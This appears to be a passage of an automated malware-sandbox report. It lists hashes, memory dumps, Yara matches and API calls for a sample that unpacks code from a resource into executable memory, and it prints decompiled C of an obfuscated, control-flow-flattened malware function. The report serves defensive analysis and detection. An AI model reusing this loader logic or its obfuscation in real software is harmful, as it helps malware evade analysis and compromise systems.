                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.677683835.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fcd7d3b6bc475ecad1ad7a383ecc6839492533c70b0766a7d340fc71ec984b00
                                                                                                                                                            • Instruction ID: 6e2ea8d94553463144734f189fb0fb47c363d83cff6f5945521bdc62943d26e5
                                                                                                                                                            • Opcode Fuzzy Hash: fcd7d3b6bc475ecad1ad7a383ecc6839492533c70b0766a7d340fc71ec984b00
                                                                                                                                                            • Instruction Fuzzy Hash: EA718961A0EBC64FEB1357786C697A17FB09F17214F1E40EBD488CB0E3E9585859C362
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.677683835.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ae32295bd5dc35de236536e21a197bbdaf2dcc7053f71b6347d61523cb889cab
                                                                                                                                                            • Instruction ID: e1d2ae8802caa2e090f77081340641bf9048fae25aff5f410c40e55ac45cd77f
                                                                                                                                                            • Opcode Fuzzy Hash: ae32295bd5dc35de236536e21a197bbdaf2dcc7053f71b6347d61523cb889cab
                                                                                                                                                            • Instruction Fuzzy Hash: E941EEA194E7C24FE713477858A57A13FB09F57214F0E04EBE488CF0A3E558999AD322
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:16.1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                                            Signature Coverage:21.9%
                                                                                                                                                            Total number of Nodes:297
                                                                                                                                                            Total number of Limit Nodes:23

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                            • _printf.LIBCMT ref: 1001265F
                                                                                                                                                            • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                                            • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                                            • _malloc.LIBCMT ref: 100127F5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                                            • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                                            • API String ID: 572389289-2839844625
                                                                                                                                                            • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                                            • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                                            • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                                            • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                                            • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                                            • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                                            • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                                            • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                            			E0037F8FD() {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				char _v1560;
                                                                                                                                                            				signed int _v1564;
                                                                                                                                                            				signed int _v1568;
                                                                                                                                                            				signed int _v1572;
                                                                                                                                                            				signed int _v1576;
                                                                                                                                                            				signed int _v1580;
                                                                                                                                                            				signed int _v1584;
                                                                                                                                                            				signed int _v1588;
                                                                                                                                                            				signed int _v1592;
                                                                                                                                                            				signed int _v1596;
                                                                                                                                                            				signed int _v1600;
                                                                                                                                                            				signed int _v1604;
                                                                                                                                                            				signed int _v1608;
                                                                                                                                                            				signed int _v1612;
                                                                                                                                                            				signed int _v1616;
                                                                                                                                                            				signed int _v1620;
                                                                                                                                                            				signed int _v1624;
                                                                                                                                                            				signed int _v1628;
                                                                                                                                                            				signed int _v1632;
                                                                                                                                                            				signed int _v1636;
                                                                                                                                                            				signed int _v1640;
                                                                                                                                                            				signed int _v1644;
                                                                                                                                                            				signed int _v1648;
                                                                                                                                                            				signed int _v1652;
                                                                                                                                                            				signed int _v1656;
                                                                                                                                                            				signed int _v1660;
                                                                                                                                                            				signed int _v1664;
                                                                                                                                                            				signed int _v1668;
                                                                                                                                                            				signed int _v1672;
                                                                                                                                                            				signed int _v1676;
                                                                                                                                                            				signed int _v1680;
                                                                                                                                                            				signed int _v1684;
                                                                                                                                                            				signed int _v1688;
                                                                                                                                                            				signed int _v1692;
                                                                                                                                                            				signed int _v1696;
                                                                                                                                                            				signed int _v1700;
                                                                                                                                                            				signed short* _t368;
                                                                                                                                                            				signed int _t381;
                                                                                                                                                            				signed int* _t383;
                                                                                                                                                            				signed int _t385;
                                                                                                                                                            				signed int _t386;
                                                                                                                                                            				signed int _t387;
                                                                                                                                                            				signed int _t388;
                                                                                                                                                            				signed int _t389;
                                                                                                                                                            				signed int _t390;
                                                                                                                                                            				signed int _t391;
                                                                                                                                                            				signed int _t392;
                                                                                                                                                            				signed int _t393;
                                                                                                                                                            				signed int _t394;
                                                                                                                                                            				signed int _t395;
                                                                                                                                                            				signed int _t405;
                                                                                                                                                            				signed int* _t438;
                                                                                                                                                            				void* _t439;
                                                                                                                                                            				signed short* _t445;
                                                                                                                                                            				signed int* _t446;
                                                                                                                                                            
                                                                                                                                                            				_t446 =  &_v1700;
                                                                                                                                                            				_v1636 = 0x636551;
                                                                                                                                                            				_t2 =  &_v1636; // 0x636551
                                                                                                                                                            				_t385 = 0x5e;
                                                                                                                                                            				_v1636 =  *_t2 / _t385;
                                                                                                                                                            				_t383 = 0;
                                                                                                                                                            				_t386 = 0x7a;
                                                                                                                                                            				_t439 = 0x12dab9f;
                                                                                                                                                            				_v1636 = _v1636 * 0x55;
                                                                                                                                                            				_v1636 = _v1636 ^ 0x0059e0ec;
                                                                                                                                                            				_v1616 = 0x84ec4b;
                                                                                                                                                            				_v1616 = _v1616 + 0xffff958e;
                                                                                                                                                            				_v1616 = _v1616 << 6;
                                                                                                                                                            				_v1616 = _v1616 ^ 0x212f9cfc;
                                                                                                                                                            				_v1624 = 0x57c2af;
                                                                                                                                                            				_v1624 = _v1624 / _t386;
                                                                                                                                                            				_v1624 = _v1624 >> 0xa;
                                                                                                                                                            				_v1624 = _v1624 ^ 0x000a9340;
                                                                                                                                                            				_v1676 = 0x94d6a3;
                                                                                                                                                            				_v1676 = _v1676 >> 3;
                                                                                                                                                            				_t387 = 0x41;
                                                                                                                                                            				_v1676 = _v1676 * 0x79;
                                                                                                                                                            				_v1676 = _v1676 * 0x68;
                                                                                                                                                            				_v1676 = _v1676 ^ 0x9280c2f7;
                                                                                                                                                            				_v1644 = 0x578290;
                                                                                                                                                            				_v1644 = _v1644 | 0x80e552f7;
                                                                                                                                                            				_v1644 = _v1644 + 0xffffd80b;
                                                                                                                                                            				_v1644 = _v1644 ^ 0x80feae5e;
                                                                                                                                                            				_v1652 = 0x70c956;
                                                                                                                                                            				_v1652 = _v1652 ^ 0x31ba76f8;
                                                                                                                                                            				_v1652 = _v1652 ^ 0x87f2510e;
                                                                                                                                                            				_v1652 = _v1652 ^ 0xb63594c0;
                                                                                                                                                            				_v1696 = 0x39dcdb;
                                                                                                                                                            				_v1696 = _v1696 * 0x22;
                                                                                                                                                            				_v1696 = _v1696 >> 0xf;
                                                                                                                                                            				_v1696 = _v1696 * 0x75;
                                                                                                                                                            				_v1696 = _v1696 ^ 0x000247c6;
                                                                                                                                                            				_v1572 = 0x793846;
                                                                                                                                                            				_v1572 = _v1572 + 0xfc60;
                                                                                                                                                            				_v1572 = _v1572 ^ 0x007fa213;
                                                                                                                                                            				_v1576 = 0x3629f6;
                                                                                                                                                            				_v1576 = _v1576 | 0x7f6cc17b;
                                                                                                                                                            				_v1576 = _v1576 ^ 0x7f7c74a2;
                                                                                                                                                            				_v1600 = 0x630dc0;
                                                                                                                                                            				_v1600 = _v1600 | 0x8a3170d6;
                                                                                                                                                            				_v1600 = _v1600 ^ 0x8a7fe201;
                                                                                                                                                            				_v1664 = 0xe79625;
                                                                                                                                                            				_v1664 = _v1664 * 0x57;
                                                                                                                                                            				_v1664 = _v1664 ^ 0xe47ae09a;
                                                                                                                                                            				_v1664 = _v1664 + 0xffff598f;
                                                                                                                                                            				_v1664 = _v1664 ^ 0xaac0e7d1;
                                                                                                                                                            				_v1648 = 0xac147c;
                                                                                                                                                            				_v1648 = _v1648 << 4;
                                                                                                                                                            				_v1648 = _v1648 / _t387;
                                                                                                                                                            				_v1648 = _v1648 ^ 0x00264750;
                                                                                                                                                            				_v1588 = 0x745952;
                                                                                                                                                            				_t98 =  &_v1588; // 0x745952
                                                                                                                                                            				_v1588 =  *_t98 * 0x3a;
                                                                                                                                                            				_v1588 = _v1588 ^ 0x1a53f4d8;
                                                                                                                                                            				_v1672 = 0x57a21b;
                                                                                                                                                            				_t388 = 0x49;
                                                                                                                                                            				_v1672 = _v1672 / _t388;
                                                                                                                                                            				_t389 = 0x63;
                                                                                                                                                            				_v1672 = _v1672 / _t389;
                                                                                                                                                            				_v1672 = _v1672 | 0xd6f4ed27;
                                                                                                                                                            				_v1672 = _v1672 ^ 0xd6feee0f;
                                                                                                                                                            				_v1620 = 0xc904e8;
                                                                                                                                                            				_t390 = 0x17;
                                                                                                                                                            				_v1620 = _v1620 * 0x6d;
                                                                                                                                                            				_v1620 = _v1620 + 0x178d;
                                                                                                                                                            				_v1620 = _v1620 ^ 0x5592dda0;
                                                                                                                                                            				_v1688 = 0x59d198;
                                                                                                                                                            				_v1688 = _v1688 | 0x5938a823;
                                                                                                                                                            				_v1688 = _v1688 ^ 0x788d0eee;
                                                                                                                                                            				_v1688 = _v1688 + 0xffff1978;
                                                                                                                                                            				_v1688 = _v1688 ^ 0x21fe2fab;
                                                                                                                                                            				_v1612 = 0xa097a2;
                                                                                                                                                            				_v1612 = _v1612 << 9;
                                                                                                                                                            				_v1612 = _v1612 / _t390;
                                                                                                                                                            				_v1612 = _v1612 ^ 0x02dc2d90;
                                                                                                                                                            				_v1700 = 0xb7b4a0;
                                                                                                                                                            				_t391 = 0x36;
                                                                                                                                                            				_v1700 = _v1700 / _t391;
                                                                                                                                                            				_v1700 = _v1700 >> 1;
                                                                                                                                                            				_v1700 = _v1700 | 0xee164e4b;
                                                                                                                                                            				_v1700 = _v1700 ^ 0xee1e6de5;
                                                                                                                                                            				_v1680 = 0xe4ad14;
                                                                                                                                                            				_v1680 = _v1680 | 0xe839ddc8;
                                                                                                                                                            				_v1680 = _v1680 ^ 0xfe881b96;
                                                                                                                                                            				_t392 = 0x42;
                                                                                                                                                            				_v1680 = _v1680 * 0x4e;
                                                                                                                                                            				_v1680 = _v1680 ^ 0xd7ed2c6e;
                                                                                                                                                            				_v1656 = 0xa710a4;
                                                                                                                                                            				_v1656 = _v1656 + 0xfffff8f1;
                                                                                                                                                            				_v1656 = _v1656 ^ 0xcc5b21c1;
                                                                                                                                                            				_v1656 = _v1656 ^ 0xccf98fb8;
                                                                                                                                                            				_v1628 = 0x5fc40d;
                                                                                                                                                            				_v1628 = _v1628 + 0xb682;
                                                                                                                                                            				_v1628 = _v1628 << 6;
                                                                                                                                                            				_v1628 = _v1628 ^ 0x181c8c04;
                                                                                                                                                            				_v1640 = 0xd7aa78;
                                                                                                                                                            				_v1640 = _v1640 + 0x8e1d;
                                                                                                                                                            				_v1640 = _v1640 / _t392;
                                                                                                                                                            				_v1640 = _v1640 ^ 0x0007a72a;
                                                                                                                                                            				_v1580 = 0xbf48f6;
                                                                                                                                                            				_t393 = 0x25;
                                                                                                                                                            				_v1580 = _v1580 * 0xd;
                                                                                                                                                            				_v1580 = _v1580 ^ 0x09b7b49e;
                                                                                                                                                            				_v1564 = 0xff195;
                                                                                                                                                            				_v1564 = _v1564 + 0x8c1b;
                                                                                                                                                            				_v1564 = _v1564 ^ 0x00104e06;
                                                                                                                                                            				_v1684 = 0xbf1e83;
                                                                                                                                                            				_v1684 = _v1684 / _t393;
                                                                                                                                                            				_t394 = 0x77;
                                                                                                                                                            				_v1684 = _v1684 / _t394;
                                                                                                                                                            				_v1684 = _v1684 + 0xa662;
                                                                                                                                                            				_v1684 = _v1684 ^ 0x0006fc0d;
                                                                                                                                                            				_v1596 = 0xc39bae;
                                                                                                                                                            				_v1596 = _v1596 << 2;
                                                                                                                                                            				_v1596 = _v1596 ^ 0x030cfbaf;
                                                                                                                                                            				_v1568 = 0x66568e;
                                                                                                                                                            				_v1568 = _v1568 | 0x44ac0d6e;
                                                                                                                                                            				_v1568 = _v1568 ^ 0x44e9cf2b;
                                                                                                                                                            				_v1692 = 0x3d2b27;
                                                                                                                                                            				_v1692 = _v1692 + 0x3fae;
                                                                                                                                                            				_t395 = 0x71;
                                                                                                                                                            				_v1692 = _v1692 / _t395;
                                                                                                                                                            				_v1692 = _v1692 + 0xffff1a11;
                                                                                                                                                            				_v1692 = _v1692 ^ 0xffffbf57;
                                                                                                                                                            				_v1632 = 0xb4dfda;
                                                                                                                                                            				_v1632 = _v1632 * 9;
                                                                                                                                                            				_v1632 = _v1632 >> 3;
                                                                                                                                                            				_v1632 = _v1632 ^ 0x00c4553b;
                                                                                                                                                            				_v1584 = 0x206e7a;
                                                                                                                                                            				_v1584 = _v1584 << 7;
                                                                                                                                                            				_v1584 = _v1584 ^ 0x10371375;
                                                                                                                                                            				_v1592 = 0x689459;
                                                                                                                                                            				_v1592 = _v1592 + 0xffffb773;
                                                                                                                                                            				_v1592 = _v1592 ^ 0x00637077;
                                                                                                                                                            				_v1660 = 0x8b14df;
                                                                                                                                                            				_v1660 = _v1660 << 0xd;
                                                                                                                                                            				_v1660 = _v1660 + 0x9803;
                                                                                                                                                            				_v1660 = _v1660 << 0xa;
                                                                                                                                                            				_v1660 = _v1660 ^ 0x71eeeb6f;
                                                                                                                                                            				_v1608 = 0x8e767e;
                                                                                                                                                            				_v1608 = _v1608 | 0xfaf7fbb6;
                                                                                                                                                            				_v1608 = _v1608 ^ 0xfaf9bdf5;
                                                                                                                                                            				_v1668 = 0xccd677;
                                                                                                                                                            				_v1668 = _v1668 * 0x78;
                                                                                                                                                            				_v1668 = _v1668 + 0xffff6b3d;
                                                                                                                                                            				_v1668 = _v1668 + 0xf0ff;
                                                                                                                                                            				_v1668 = _v1668 ^ 0x600a3b9e;
                                                                                                                                                            				_v1604 = 0x7c05f9;
                                                                                                                                                            				_v1604 = _v1604 + 0xd55a;
                                                                                                                                                            				_v1604 = _v1604 ^ 0x007aedaa;
                                                                                                                                                            				_t445 = _v1604;
                                                                                                                                                            				while(_t439 != 0x12dab9f) {
                                                                                                                                                            					if(_t439 == 0x2f8e73a) {
                                                                                                                                                            						_push(_v1604);
                                                                                                                                                            						_push(_t383);
                                                                                                                                                            						_push(_t395);
                                                                                                                                                            						_push(_t383);
                                                                                                                                                            						_push(_t383);
                                                                                                                                                            						_push(_v1668);
                                                                                                                                                            						_push(_t445);
                                                                                                                                                            						E0037AB87(_v1660, _v1608, __eflags);
                                                                                                                                                            						_t383 = 1;
                                                                                                                                                            						__eflags = 1;
                                                                                                                                                            						L23:
                                                                                                                                                            						return _t383;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t439 == 0x92208ae) {
                                                                                                                                                            						_t368 = _t445;
                                                                                                                                                            						__eflags =  *_t445 - _t383;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							L18:
                                                                                                                                                            							_t439 = 0xeef82b0;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L11;
                                                                                                                                                            						}
                                                                                                                                                            						do {
                                                                                                                                                            							L11:
                                                                                                                                                            							__eflags =  *_t368 - 0x2c;
                                                                                                                                                            							if( *_t368 != 0x2c) {
                                                                                                                                                            								goto L17;
                                                                                                                                                            							}
                                                                                                                                                            							_t438 =  &_v1560;
                                                                                                                                                            							while(1) {
                                                                                                                                                            								_t368 =  &(_t368[1]);
                                                                                                                                                            								_t405 =  *_t368 & 0x0000ffff;
                                                                                                                                                            								__eflags = _t405;
                                                                                                                                                            								if(_t405 == 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t405 - 0x20;
                                                                                                                                                            								if(_t405 == 0x20) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								 *_t438 = _t405;
                                                                                                                                                            								_t438 =  &(_t438[0]);
                                                                                                                                                            								__eflags = _t438;
                                                                                                                                                            							}
                                                                                                                                                            							_t395 = 0;
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							 *_t438 = 0;
                                                                                                                                                            							L17:
                                                                                                                                                            							_t368 =  &(_t368[1]);
                                                                                                                                                            							__eflags =  *_t368 - _t383;
                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                            						goto L18;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t439 == 0x99a67ee) {
                                                                                                                                                            						_t445 = E0037F899(_t395);
                                                                                                                                                            						_t439 = 0x92208ae;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t439 == 0x9e65a83) {
                                                                                                                                                            						_push(_v1612);
                                                                                                                                                            						_push(_v1636);
                                                                                                                                                            						_push(_v1688);
                                                                                                                                                            						_push( &_v520); // executed
                                                                                                                                                            						E003846BB(_v1672, _v1620); // executed
                                                                                                                                                            						E0038DA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
                                                                                                                                                            						_push(_v1564);
                                                                                                                                                            						_push(_v1580);
                                                                                                                                                            						E003747CE( &_v520, _v1684, _v1640, _v1596, _v1568, E0038DCF7(_v1640, 0x371140, __eflags),  &_v1040, _v1692, _v1632);
                                                                                                                                                            						_t395 = _v1584;
                                                                                                                                                            						E0037A8B0(_t395, _t375, _v1592);
                                                                                                                                                            						_t446 = _t446 - 0xc + 0x58;
                                                                                                                                                            						_t439 = 0x2f8e73a;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					_t457 = _t439 - 0xeef82b0;
                                                                                                                                                            					if(_t439 == 0xeef82b0) {
                                                                                                                                                            						_push(_v1696);
                                                                                                                                                            						_push(_v1652);
                                                                                                                                                            						_t381 = E0037B23C(_v1572, _v1576, E0038DCF7(_v1644, 0x3710c0, _t457), _v1600, _v1664,  &_v1560); // executed
                                                                                                                                                            						_t395 = _v1648;
                                                                                                                                                            						asm("sbb edi, edi");
                                                                                                                                                            						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
                                                                                                                                                            						E0037A8B0(_t395, _t379, _v1588);
                                                                                                                                                            						_t446 =  &(_t446[7]);
                                                                                                                                                            					}
                                                                                                                                                            					L20:
                                                                                                                                                            					if(_t439 != 0xdf158d7) {
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L23;
                                                                                                                                                            				}
                                                                                                                                                            				E00374B61( &_v1560, 0x208, _v1616, _v1624);
                                                                                                                                                            				_pop(_t395);
                                                                                                                                                            				_t439 = 0x99a67ee;
                                                                                                                                                            				goto L20;
                                                                                                                                                            			}
                                                                                                                                                            0x0037f9a3
                                                                                                                                                            0x0037f9ab
                                                                                                                                                            0x0037f9b3
                                                                                                                                                            0x0037f9bb
                                                                                                                                                            0x0037f9c3
                                                                                                                                                            0x0037f9cb
                                                                                                                                                            0x0037f9d3
                                                                                                                                                            0x0037f9db
                                                                                                                                                            0x0037f9e3
                                                                                                                                                            0x0037f9f0
                                                                                                                                                            0x0037f9f4
                                                                                                                                                            0x0037f9fe
                                                                                                                                                            0x0037fa02
                                                                                                                                                            0x0037fa0a
                                                                                                                                                            0x0037fa15
                                                                                                                                                            0x0037fa20
                                                                                                                                                            0x0037fa2b
                                                                                                                                                            0x0037fa36
                                                                                                                                                            0x0037fa41
                                                                                                                                                            0x0037fa4c
                                                                                                                                                            0x0037fa54
                                                                                                                                                            0x0037fa5c
                                                                                                                                                            0x0037fa64
                                                                                                                                                            0x0037fa71
                                                                                                                                                            0x0037fa75
                                                                                                                                                            0x0037fa7d
                                                                                                                                                            0x0037fa85
                                                                                                                                                            0x0037fa8d
                                                                                                                                                            0x0037fa95
                                                                                                                                                            0x0037faa0
                                                                                                                                                            0x0037faa4
                                                                                                                                                            0x0037faac
                                                                                                                                                            0x0037fab7
                                                                                                                                                            0x0037fabf
                                                                                                                                                            0x0037fac6
                                                                                                                                                            0x0037fad1
                                                                                                                                                            0x0037fae1
                                                                                                                                                            0x0037fae6
                                                                                                                                                            0x0037faf0
                                                                                                                                                            0x0037faf5
                                                                                                                                                            0x0037fafb
                                                                                                                                                            0x0037fb03
                                                                                                                                                            0x0037fb0b
                                                                                                                                                            0x0037fb18
                                                                                                                                                            0x0037fb1b
                                                                                                                                                            0x0037fb1f
                                                                                                                                                            0x0037fb27
                                                                                                                                                            0x0037fb2f
                                                                                                                                                            0x0037fb37
                                                                                                                                                            0x0037fb3f
                                                                                                                                                            0x0037fb47
                                                                                                                                                            0x0037fb4f
                                                                                                                                                            0x0037fb57
                                                                                                                                                            0x0037fb5f
                                                                                                                                                            0x0037fb6c
                                                                                                                                                            0x0037fb70
                                                                                                                                                            0x0037fb78
                                                                                                                                                            0x0037fb84
                                                                                                                                                            0x0037fb89
                                                                                                                                                            0x0037fb8f
                                                                                                                                                            0x0037fb93
                                                                                                                                                            0x0037fb9b
                                                                                                                                                            0x0037fba3
                                                                                                                                                            0x0037fbab
                                                                                                                                                            0x0037fbb3
                                                                                                                                                            0x0037fbc0
                                                                                                                                                            0x0037fbc3
                                                                                                                                                            0x0037fbc7
                                                                                                                                                            0x0037fbcf
                                                                                                                                                            0x0037fbd7
                                                                                                                                                            0x0037fbdf
                                                                                                                                                            0x0037fbe7
                                                                                                                                                            0x0037fbef
                                                                                                                                                            0x0037fbf7
                                                                                                                                                            0x0037fbff
                                                                                                                                                            0x0037fc04
                                                                                                                                                            0x0037fc0c
                                                                                                                                                            0x0037fc14
                                                                                                                                                            0x0037fc24
                                                                                                                                                            0x0037fc28
                                                                                                                                                            0x0037fc30
                                                                                                                                                            0x0037fc43
                                                                                                                                                            0x0037fc44
                                                                                                                                                            0x0037fc4b
                                                                                                                                                            0x0037fc56
                                                                                                                                                            0x0037fc61
                                                                                                                                                            0x0037fc6c
                                                                                                                                                            0x0037fc77
                                                                                                                                                            0x0037fc87
                                                                                                                                                            0x0037fc91
                                                                                                                                                            0x0037fc96
                                                                                                                                                            0x0037fc9c
                                                                                                                                                            0x0037fca4
                                                                                                                                                            0x0037fcac
                                                                                                                                                            0x0037fcb4
                                                                                                                                                            0x0037fcb9
                                                                                                                                                            0x0037fcc1
                                                                                                                                                            0x0037fccc
                                                                                                                                                            0x0037fcd7
                                                                                                                                                            0x0037fce2
                                                                                                                                                            0x0037fcea
                                                                                                                                                            0x0037fcf6
                                                                                                                                                            0x0037fcf9
                                                                                                                                                            0x0037fcfd
                                                                                                                                                            0x0037fd05
                                                                                                                                                            0x0037fd0d
                                                                                                                                                            0x0037fd1a
                                                                                                                                                            0x0037fd1e
                                                                                                                                                            0x0037fd23
                                                                                                                                                            0x0037fd2b
                                                                                                                                                            0x0037fd36
                                                                                                                                                            0x0037fd3e
                                                                                                                                                            0x0037fd49
                                                                                                                                                            0x0037fd51
                                                                                                                                                            0x0037fd59
                                                                                                                                                            0x0037fd61
                                                                                                                                                            0x0037fd69
                                                                                                                                                            0x0037fd6e
                                                                                                                                                            0x0037fd76
                                                                                                                                                            0x0037fd7b
                                                                                                                                                            0x0037fd83
                                                                                                                                                            0x0037fd8b
                                                                                                                                                            0x0037fd93
                                                                                                                                                            0x0037fd9b
                                                                                                                                                            0x0037fda8
                                                                                                                                                            0x0037fdac
                                                                                                                                                            0x0037fdb4
                                                                                                                                                            0x0037fdbc
                                                                                                                                                            0x0037fdc4
                                                                                                                                                            0x0037fdcc
                                                                                                                                                            0x0037fdd4
                                                                                                                                                            0x0037fddc
                                                                                                                                                            0x0037fde0
                                                                                                                                                            0x0037fdf2
                                                                                                                                                            0x0037ffd1
                                                                                                                                                            0x0037ffd5
                                                                                                                                                            0x0037ffd6
                                                                                                                                                            0x0037ffd7
                                                                                                                                                            0x0037ffd8
                                                                                                                                                            0x0037ffd9
                                                                                                                                                            0x0037ffe8
                                                                                                                                                            0x0037ffe9
                                                                                                                                                            0x0037fff3
                                                                                                                                                            0x0037fff3
                                                                                                                                                            0x0037fff7
                                                                                                                                                            0x00380000
                                                                                                                                                            0x00380000
                                                                                                                                                            0x0037fdfe
                                                                                                                                                            0x0037ff5e
                                                                                                                                                            0x0037ff60
                                                                                                                                                            0x0037ff64
                                                                                                                                                            0x0037ff99
                                                                                                                                                            0x0037ff99
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff66
                                                                                                                                                            0x0037ff66
                                                                                                                                                            0x0037ff66
                                                                                                                                                            0x0037ff6a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff6c
                                                                                                                                                            0x0037ff81
                                                                                                                                                            0x0037ff81
